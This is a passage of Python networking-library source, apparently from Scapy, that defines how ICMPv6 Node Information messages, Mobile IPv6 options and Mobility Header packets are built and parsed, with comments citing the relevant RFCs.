#        directly anyway. Same remark for addfield() and i2m()
#
# -- arno

# "The type of information present in the Data field of a query is
#  declared by the ICMP Code, whereas the type of information in a
#  Reply is determined by the Qtype"

def names2dnsrepr(x):
    """
    Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (with possible compression)
    If a string that is already a DNS name in DNS format
    is passed, it is returned unmodified. Result is a string.
    !!!  At the moment, compression is not implemented  !!!

    Names are expected as bytes. A bytes value ending with a null byte is
    considered already encoded. A name without any dot gets one extra
    trailing null byte.
    """

    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    res = []
    for n in x:
        termin = b"\x00"
        if n.count(b'.') == 0:  # single-component gets one more
            termin += b'\x00'
        n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
        res.append(n)
    return b"".join(res)


def dnsrepr2names(x):
    """
    Take as input a DNS encoded string (possibly compressed)
    and returns a list of DNS names contained in it.
    If provided string is already in printable format
    (does not end with a null character, a one element list
    is returned). Result is a list.

    Raises Exception when a label length has one of its two top bits set
    (compression pointers are not supported).
    """
    res = []
    cur = b""
    while x:
        l = orb(x[0])
        x = x[1:]
        if not l:
            # End of a name: strip the trailing dot and store it
            if cur and cur[-1:] == b'.':
                cur = cur[:-1]
            res.append(cur)
            cur = b""
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
            continue
        if l & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        cur += x[:l] + b"."
        x = x[l:]
    return res


class NIQueryDataField(StrField):
    """Data field of NI queries, stored internally as a (type, value) pair.

    type is 0 for an IPv6 address, 1 for a DNS-encoded name and 2 for an
    IPv4 address.
    """
    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the bare value; names are decoded and the first one kept."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            val = dnsrepr2names(val)[0]
        return val

    def h2i(self, pkt, x):
        """Guess the kind of 'x' and return the matching (type, value) pair.

        A tuple whose first element is an int is taken as already being in
        internal form. Otherwise the value is tried as an IPv6 address, then
        as an IPv4 address, and finally encoded as a DNS name.
        """
        # isinstance() and not "x is tuple": the identity test compares with
        # the tuple type itself and was never true for actual pairs.
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Accept text strings too; the code below works on bytes.
        if isinstance(x, six.text_type):
            x = x.encode("utf8")

        # Try IPv6, then IPv4. Anything that cannot be decoded or parsed
        # (including None) simply falls through to the DNS case.
        for family, kind in ((socket.AF_INET6, 0), (socket.AF_INET, 2)):
            try:
                addr = x.decode()
                inet_pton(family, addr)
            except Exception:
                continue
            return (kind, addr)

        # Try DNS
        if x is None:
            x = b""
        return (1, names2dnsrepr(x))

    def i2repr(self, pkt, x):
        """Return a printable form of the internal (type, value) pair."""
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            labels = []
            while val:
                l = orb(val[0])
                val = val[1:]
                if l == 0:
                    break
                # Labels are bytes: decode them before mixing with text
                labels.append(plain_str(val[:l]))
                val = val[l:]
            return ".".join(labels)
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to pkt.qtype and pkt.code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:    # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:            # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of 'val' to s; a missing value adds nothing."""
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])


class NIQueryCodeField(ByteEnumField):
    """Code field that, when unset, follows the type stored in 'data'."""
    def i2m(self, pkt, x):
        if x is None:
            d = pkt.getfieldval("data")
            if d is None:
                return 1
            elif d[0] == 0:  # IPv6 address
                return 0
            elif d[0] == 1:  # Name
                return 1
            elif d[0] == 2:  # IPv4 address
                return 2
            else:
                return 1
        return x


_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}

#_niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
#                    8: "Link-local addresses", 16: "Site-local addresses",
#                   32: "Global addresses" }

# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]


class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2


# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E


class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4


# Reply codes. "Unknown query type" is code 2 (it was wrongly listed as 3),
# as in RFC 4620 and as in the code value the reply classes of this file use.
_nireply_code = {0: "Successful Reply",
                 1: "Response Refusal",
                 2: "Unknown query type"}

_nireply_flags = {1: "Reply set incomplete",
                  2: "All unicast addresses",
                  4: "IPv4 addresses",
                  8: "Link-local addresses",
                  16: "Site-local addresses",
                  32: "Global addresses"}

# Internal repr is one of those :
#  (0, "some string") : unknown qtype values are mapped to that one
#  (3, [ (ttl, ip6), ... ])
#  (4, [ (ttl, ip4), ... ])
#  (2, [ttl, dns_names]) : dns_names is one string that contains
#     all the DNS names. Internally it is kept ready to be sent
#     (undissected). i2repr() decodes it for the user. This is to
#     make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
    """Data field of NI replies, stored as a (qtype, value) pair."""

    def i2h(self, pkt, x):
        """Return the bare value; DNS names come back as [ttl, name, ...]."""
        if x is None:
            return x
        t, val = x
        if t == 2:
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
        """Convert a user value to the internal (qtype, value) pair.

        The qtype comes from the first element when x is a tuple, otherwise
        from pkt.qtype when a packet is available, otherwise it is 0.
        """
        qtype = 0  # We will decode it as string if not
                   # overridden through 'qtype' in pkt

        # No user hint, let's use 'qtype' value for that purpose
        if not isinstance(x, tuple):
            if pkt is not None:
                qtype = pkt.qtype
        else:
            qtype = x[0]
            x = x[1]

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [val.encode() if isinstance(val, str) else val for val in x]
            # A leading integer is the TTL, the rest are the names
            if x and isinstance(x[0], six.integer_types):
                ttl = x[0]
                names = x[1:]
            else:
                ttl = 0
                names = x
            return (2, [ttl, names2dnsrepr(names)])

        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if six.PY3 and isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal pair 'val' to s."""
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        elif t == 3:
            # Each entry is (ttl, IPv6 address)
            return s + b"".join(
                struct.pack("!I", e[0]) + inet_pton(socket.AF_INET6, e[1])
                for e in tmp)
        elif t == 4:
            # Each entry is (ttl, IPv4 address)
            return s + b"".join(
                struct.pack("!I", e[0]) + inet_pton(socket.AF_INET, e[1])
                for e in tmp)
        else:
            return s + tmp

    def getfield(self, pkt, s):
        """Dissect the data according to pkt.code and pkt.qtype."""
        code = getattr(pkt, "code")
        if code != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        elif qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        elif qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                res.append((ttl, ip))
                s = s[20:]
            return s, (3, res)

        elif qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                res.append((ttl, ip))
                s = s[8:]
            return s, (4, res)
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal pair."""
        if x is None:
            return "[]"

        if isinstance(x, tuple) and len(x) == 2:
            t, val = x
            if t == 2:  # DNS names
                ttl, dnsstr = val
                # dnsrepr2names() yields bytes: decode before joining with a
                # text separator (joining bytes raised TypeError on Python 3)
                names = [plain_str(n) for n in dnsrepr2names(dnsstr)]
                return "ttl:%d %s" % (ttl, ", ".join(names))
            elif t == 3 or t == 4:
                return "[ %s ]" % (", ".join("(%d, %s)" % (e[0], e[1])
                                             for e in val))
            return repr(val)
        return repr(x)  # XXX should not happen


# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [ByteEnumField("type", 140, icmp6types),
                   ByteEnumField("code", 0, _nireply_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIReplyDataField("data", None)]


class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2


class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3


class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4


class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1


class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2


def _niquery_guesser(p):
    """Pick the NI class matching the raw ICMPv6 message p.

    Byte 0 is the ICMPv6 type (139 query, 140 reply), byte 1 the code and
    bytes 4-5 the qtype. conf.raw_layer is returned when nothing matches.
    """
    cls = conf.raw_layer
    msg_type = orb(p[0])  # not named 'type', to leave the builtin alone
    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            cls = {0: ICMPv6NIQueryNOOP,
                   2: ICMPv6NIQueryName,
                   3: ICMPv6NIQueryIPv6,
                   4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
    elif msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 0:
            if len(p) > 6:
                qtype, = struct.unpack("!H", p[4:6])
                cls = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
        elif code == 1:
            cls = ICMPv6NIReplyRefuse
        elif code == 2:
            cls = ICMPv6NIReplyUnknown
    return cls


#############################################################################
#############################################################################
###             Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                ###
#############################################################################
#############################################################################

# Mobile IPv6 ICMPv6 related classes

class ICMPv6HAADRequest(_ICMPv6):
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        return struct.pack("!H", self.id) + self.payload.hashret()


class ICMPv6HAADReply(_ICMPv6):
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        return struct.pack("!H", self.id) + self.payload.hashret()

    def answers(self, other):
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        return self.id == other.id


class ICMPv6MPSol(_ICMPv6):
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        # Same value as ICMPv6MPAdv.hashret(), so that a solicitation and
        # its advertisement hash alike. The method used to be spelled
        # '_hashret' only and was therefore never picked up as hashret().
        return struct.pack("!H", self.id)

    # Former (misspelled) name, kept for backward compatibility
    _hashret = hashret


class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        return struct.pack("!H", self.id)

    def answers(self, other):
        return isinstance(other, ICMPv6MPSol)


# Mobile IPv6 Options classes


_mobopttypes = {2: "Binding Refresh Advice",
                3: "Alternate Care-of Address",
                4: "Nonce Indices",
                5: "Binding Authorization Data",
                6: "Mobile Network Prefix (RFC3963)",
                7: "Link-Layer Address (RFC4068)",
                8: "Mobile Node Identifier (RFC4283)",
                9: "Mobility Message Authentication (RFC4285)",
                10: "Replay Protection (RFC4285)",
                11: "CGA Parameters Request (RFC4866)",
                12: "CGA Parameters (RFC4866)",
                13: "Signature (RFC4866)",
                14: "Home Keygen Token (RFC4866)",
                15: "Care-of Test Init (RFC4866)",
                16: "Care-of Test (RFC4866)"}


class _MIP6OptAlign:
    """ Mobile IPv6 options have alignment requirements of the form x*n+y.
    This class is inherited by all MIPv6 options to help in computing the
    required Padding for that option, i.e. the need for a Pad1 or PadN
    option before it. They only need to provide x and y as class
    parameters. (x=0 and y=0 are used when no alignment is required)"""
    def alignment_delta(self, curpos):
        """Return the number of padding bytes needed at offset curpos.

        This is the smallest delta >= 0 such that curpos + delta is of the
        form x*n + y; 0 when x and y are both 0.
        """
        x = self.x
        y = self.y
        if x == 0 and y == 0:
            return 0
        delta = x * ((curpos - y + x - 1) // x) + y - curpos
        return delta


class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
                   ByteField('olen', 2),
                   ShortField('rinter', 0)]
    x = 2
    y = 0  # alignment requirement: 2n


class MIP6OptAltCoA(_MIP6OptAlign, Packet):
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
                   ByteField('olen', 16),
                   IP6Field("acoa", "::")]
    x = 8
    y = 6  # alignment requirement: 8n+6


class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
    name = 'MIPv6 Option - Nonce Indices'
    # NOTE(review): default olen is 16 although the two ShortFields below
    # add up to 4 bytes -- confirm against RFC 3775 before changing it.
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   ByteField('olen', 16),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n


class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
    name = 'MIPv6 Option - Binding Authorization Data'
    # NOTE(review): default olen is 16 although the 96-bit authenticator is
    # 12 bytes long -- confirm against RFC 3775 before changing it.
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   ByteField('olen', 16),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2


class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet):  # NEMO - RFC 3963
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
                   ByteField("olen", 18),
                   ByteField("reserved", 0),
                   ByteField("plen", 64),
                   IP6Field("prefix", "::")]
    x = 8
    y = 4  # alignment requirement: 8n+4


class MIP6OptLLAddr(_MIP6OptAlign, Packet):  # Sect 6.4.4 of RFC 4068
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
                   ByteField("olen", 7),
                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
                   ByteField("pad", 0),
                   MACField("lla", ETHER_ANY)]  # Only support ethernet
    x = 0
    y = 0  # alignment requirement: none


class MIP6OptMNID(_MIP6OptAlign, Packet):  # RFC 4283
    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
                   # olen covers 'subtype' (1 byte) plus 'id'
                   FieldLenField("olen", None, length_of="id", fmt="B",
                                 adjust=lambda pkt, x: x + 1),
                   ByteEnumField("subtype", 1, {1: "NAI"}),
                   StrLenField("id", "",
                               length_from=lambda pkt: pkt.olen - 1)]
    x = 0
    y = 0  # alignment requirement: none


# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet):  # RFC 4285 (Sect. 5)
    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
                   # olen covers 'subtype' (1), 'mspi' (4) plus 'authdata'
                   FieldLenField("olen", None, length_of="authdata", fmt="B",
                                 adjust=lambda pkt, x: x + 5),
                   ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
                                                2: "MN-AAA authentication mobility option"}),
                   IntField("mspi", None),
                   StrLenField("authdata", "A" * 12,
                               length_from=lambda pkt: pkt.olen - 5)]
    x = 4
    y = 1  # alignment requirement: 4n+1


# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
    """64-bit NTP timestamp (32-bit seconds since 1900, 32-bit fraction)."""

    # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the Unix
    # epoch (1970-01-01 00:00:00 UTC): 70 years including 17 leap days.
    _NTP_TO_UNIX_DELTA = 2208988800

    def i2repr(self, pkt, x):
        """Return the timestamp as an RFC 822-like UTC date plus raw value.

        Values whose seconds part is below roughly 50 years after 1900 are
        not converted; a placeholder string is returned for them instead.
        """
        if x < ((50*31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        seconds = int(x >> 32)
        fraction = float(x & 0xffffffff) * 2.0**-32
        unix_time = seconds + fraction - self._NTP_TO_UNIX_DELTA
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(unix_time))

        return "%s (%d)" % (t, x)


class MIP6OptReplayProtection(_MIP6OptAlign, Packet):  # RFC 4285 (Sect. 6)
    """Replay Protection mobility option (option type 10)."""
    name = "MIPv6 option - Replay Protection"
    fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
                   ByteField("olen", 8),
                   NTPTimestampField("timestamp", 0)]
    # alignment requirement: 8n+2
    x = 8
    y = 2


class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.6)
    """CGA Parameters Request mobility option (option type 11, no data)."""
    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
                   ByteField("olen", 0)]
    # alignment requirement: none
    x = 0
    y = 0


# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX       version. Passing of a big CGAParam structure should be
# XXX       simplified. Make it hold packets, by the way  --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.1)
    """CGA Parameters mobility option (option type 12), opaque payload."""
    name = "MIPv6 option - CGA Parameters"
    fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
                   FieldLenField("olen", None, length_of="cgaparams",
                                 fmt="B"),
                   StrLenField("cgaparams", "",
                               length_from=lambda pkt: pkt.olen)]
    # alignment requirement: none
    x = 0
    y = 0


class MIP6OptSignature(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.2)
    """Signature mobility option (option type 13), opaque payload."""
    name = "MIPv6 option - Signature"
    fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
                   FieldLenField("olen", None, length_of="sig", fmt="B"),
                   StrLenField("sig", "",
                               length_from=lambda pkt: pkt.olen)]
    # alignment requirement: none
    x = 0
    y = 0


class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.3)
    """Permanent Home Keygen Token mobility option (option type 14)."""
    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
                   FieldLenField("olen", None, length_of="hkt", fmt="B"),
                   StrLenField("hkt", "",
                               length_from=lambda pkt: pkt.olen)]
    # alignment requirement: none
    x = 0
    y = 0


class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.4)
    """Care-of Test Init mobility option (option type 15, no data)."""
    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
                   ByteField("olen", 0)]
    # alignment requirement: none
    x = 0
    y = 0


class MIP6OptCareOfTest(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.5)
    """Care-of Test mobility option (option type 16)."""
    name = "MIPv6 option - Care-of Test"
    fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
                   FieldLenField("olen", None, length_of="cokt", fmt="B"),
                   StrLenField("cokt", b'\x00'*8,
                               length_from=lambda pkt: pkt.olen)]
    # alignment requirement: none
    x = 0
    y = 0


class MIP6OptUnknown(_MIP6OptAlign, Packet):
    """Fallback used to dissect mobility options with no dedicated class."""
    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
                   FieldLenField("olen", None, length_of="odata", fmt="B"),
                   StrLenField("odata", "",
                               length_from=lambda pkt: pkt.olen)]
    # alignment requirement: none
    x = 0
    y = 0


# Mobility option type -> class used to dissect it
moboptcls = {0: Pad1,
             1: PadN,
             2: MIP6OptBRAdvice,
             3: MIP6OptAltCoA,
             4: MIP6OptNonceIndices,
             5: MIP6OptBindingAuthData,
             6: MIP6OptMobNetPrefix,
             7: MIP6OptLLAddr,
             8: MIP6OptMNID,
             9: MIP6OptMsgAuth,
             10: MIP6OptReplayProtection,
             11: MIP6OptCGAParamsReq,
             12: MIP6OptCGAParams,
             13: MIP6OptSignature,
             14: MIP6OptHomeKeygenToken,
             15: MIP6OptCareOfTestInit,
             16: MIP6OptCareOfTest}


# Main Mobile IPv6 Classes

mhtypes = {0: 'BRR',
           1: 'HoTI',
           2: 'CoTI',
           3: 'HoT',
           4: 'CoT',
           5: 'BU',
           6: 'BA',
           7: 'BE',
           8: 'Fast BU',
           9: 'Fast BA',
           10: 'Fast NA'}

# From http://www.iana.org/assignments/mobility-parameters
bastatus = {0: 'Binding Update accepted',
            1: 'Accepted but prefix discovery necessary',
            128: 'Reason unspecified',
            129: 'Administratively prohibited',
            130: 'Insufficient resources',
            131: 'Home registration not supported',
            132: 'Not home subnet',
            133: 'Not home agent for this mobile node',
            134: 'Duplicate Address Detection failed',
            135: 'Sequence number out of window',
            136: 'Expired home nonce index',
            137: 'Expired care-of nonce index',
            138: 'Expired nonces',
            139: 'Registration type change disallowed',
            140: 'Mobile Router Operation not permitted',
            141: 'Invalid Prefix',
            142: 'Not Authorized for Prefix',
            143: 'Forwarding Setup failed (prefixes missing)',
            144: 'MIPV6-ID-MISMATCH',
            145: 'MIPV6-MESG-ID-REQD',
            146: 'MIPV6-AUTH-FAIL',
            147: 'Permanent home keygen token unavailable',
            148: 'CGA and signature verification failed',
            149: 'Permanent home keygen token exists',
            150: 'Non-null home nonce index expected'}


class _MobilityHeader(Packet):
    """Common base of the Mobility Header messages.

    Subclasses are expected to provide 'len' and 'cksum' fields located
    respectively at offset 1 and offsets 4-5 of the built header.
    """
    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Fill in the header length and checksum when left to None.

        The length is expressed in units of 8 octets, not counting the
        first 8 octets. Byte strings are spliced with plain slicing so the
        result is identical on Python 2 and 3 (indexing bytes yields an int
        on Python 3).
        """
        p += pay
        hdr_len = self.len
        if hdr_len is None:
            hdr_len = (len(p) - 8) // 8
        p = p[:1] + struct.pack("B", hdr_len) + p[2:]
        if self.cksum is None:
            cksum = in6_chksum(135, self.underlayer, p)
        else:
            cksum = self.cksum
        p = p[:4] + struct.pack("!H", cksum) + p[6:]
        return p


class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Mobility Header message whose body is kept as an opaque string."""
    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", None, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   # The whole header is 8*(len+1) octets, 6 of which are
                   # the fixed fields above: 8*len+2 octets of message.
                   StrLenField("msg", b"\x00"*2,
                               length_from=lambda pkt: 8*pkt.len + 2)]


# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
    """List of mobility options with automatic alignment padding.

    'curpos' is the offset of the options field inside the Mobility Header;
    it is the starting point for the alignment computations done at build
    time.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, count_from=None,
                 length_from=None):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls,
                                 count_from=count_from,
                                 length_from=length_from)

    @staticmethod
    def _padding(delta):
        """Return 'delta' octets of padding built from Pad1/PadN options."""
        if delta == 0:
            return b""
        if delta == 1:
            return raw(Pad1())
        return raw(PadN(optdata=b'\x00'*(delta-2)))

    def getfield(self, pkt, s):
        l = self.length_from(pkt)
        return s[l:], self.m2i(pkt, s[:l])

    def i2len(self, pkt, i):
        return len(self.i2m(pkt, i))

    def m2i(self, pkt, x):
        """Dissect 'x' into a list of option packets.

        The class is selected from the option type octet; the default class
        of the field is used for unknown types and when the dedicated class
        fails to dissect the data.
        """
        opt = []
        while x:
            o = orb(x[0])  # Option type
            cls = moboptcls.get(o, self.cls)
            try:
                op = cls(x)
            except Exception:
                op = self.cls(x)
            opt.append(op)
            if isinstance(op.payload, conf.raw_layer):
                # Remaining bytes are the following options
                x = op.payload.load
                del(op.payload)
            else:
                x = b""
        return opt

    def i2m(self, pkt, x):
        """Build the options, padding them as needed unless autopad is off.

        Each option is preceded by the padding required by its alignment
        constraint, and trailing padding makes the enclosing header a
        multiple of 8 octets long.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(raw, x))

        curpos = self.curpos
        s = b""
        for p in x:
            d = p.alignment_delta(curpos)
            curpos += d
            s += self._padding(d)
            pstr = raw(p)
            curpos += len(pstr)
            s += pstr

        # Let's make the class including our option field
        # a multiple of 8 octets long
        d = curpos % 8
        if d == 0:
            return s
        return s + self._padding(8 - d)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)


class MIP6MH_BRR(_MobilityHeader):
    """Binding Refresh Request message (MH type 0)."""
    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", 0, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ShortField("res2", None),
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default
                   _MobilityOptionsField("options", [], MIP6OptUnknown, 8,
                                         length_from=lambda pkt: 8*pkt.len)]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        # Hack: BRR, BU and BA have the same hashret that returns the same
        #       value b"\x00\x08\x09" (concatenation of mhtypes). This is
        #       because we need match BA with BU and BU with BRR. --arno
        return b"\x00\x08\x09"


class MIP6MH_HoTI(_MobilityHeader):
    """Home Test Init message (MH type 1)."""
    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", 1, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
